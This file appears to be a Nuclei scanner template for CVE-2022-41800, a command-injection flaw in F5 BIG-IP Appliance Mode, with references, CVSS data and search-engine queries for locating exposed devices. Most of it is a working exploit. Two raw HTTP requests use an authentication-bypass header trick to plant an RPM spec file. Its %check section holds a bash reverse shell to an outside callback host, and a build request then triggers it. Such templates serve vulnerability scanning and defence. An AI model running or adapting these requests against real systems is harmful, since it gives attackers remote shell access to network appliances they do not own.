id: CVE-2022-41800 info: name: F5 BIG-IP Appliance Mode - Command Injection author: dwisiswant0 severity: high description: | When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. remediation: | Apply security patches from F5 Networks as outlined in K97843387 and ensure Appliance mode restrictions are properly enforced. impact: | A successful exploit can allow the attacker to execute remote commands on server using authorization bypass (CVE-2022-1388). reference: - https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800/rapid7-analysis - https://support.f5.com/csp/article/K97843387 - https://support.f5.com/csp/article/K13325942 - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/ - https://nvd.nist.gov/vuln/detail/cve-2022-41800 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N cvss-score: 8.7 cve-id: CVE-2022-41800 cwe-id: CWE-77 epss-score: 0.92678 epss-percentile: 0.9976 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true vendor: f5 product: big-ip_access_policy_manager shodan-query: - http.title:"big-ip®-+redirect" +"server" - http.html:"big-ip apm" fofa-query: - body="big-ip apm" - title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" tags: cve,cve2022,rce,f5,bigip,instrusive,vkev,vuln variables: auth: "admin:{{rand_text_alpha(1)}}" rand_app: "{{to_lower(rand_text_alpha(6))}}" rand_ver: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}" rand_rel: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}" http: - raw: - | POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1 Host: {{Hostname}} X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}} Authorization: Basic {{base64(auth)}} Content-Type: application/json Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host { "specFileData": { "name": "{{rand_app}}", "srcBasePath": "/tmp", "version": "{{rand_ver}}", "release": "{{rand_rel}}", "description": "\n\n%check\nbash -i >& /dev/tcp/{{interactsh-url}}/{{rand_text_numeric(4)}} 0>&1", "summary": "{{to_lower(rand_text_alphanumeric(10))}}" } } - | POST /mgmt/shared/iapp/build-package HTTP/1.1 Host: {{Hostname}} X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}} Authorization: Basic {{base64(auth)}} Content-Type: application/json Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host { "state": {}, "appName": "{{rand_app}}", "packageDirectory": "/tmp", "specFilePath": "{{spec}}", "force": true } extractors: - type: json part: body name: spec json: - ".specFilePath" internal: true matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - "RUN_BUILD_RPM_TASK" - "shared:iapp:build-package:buildrpmtaskstate" # digest: 4a0a0047304502204df56a459021f7bbfb857405754d2387bfa4162c5af9146916a11e101310f822022100d36c584ee3c8b19da09cd88adc98236598fc00dc2b8d467628fb394f9ad196ab:922c64590222798bb761d5b6d8e72950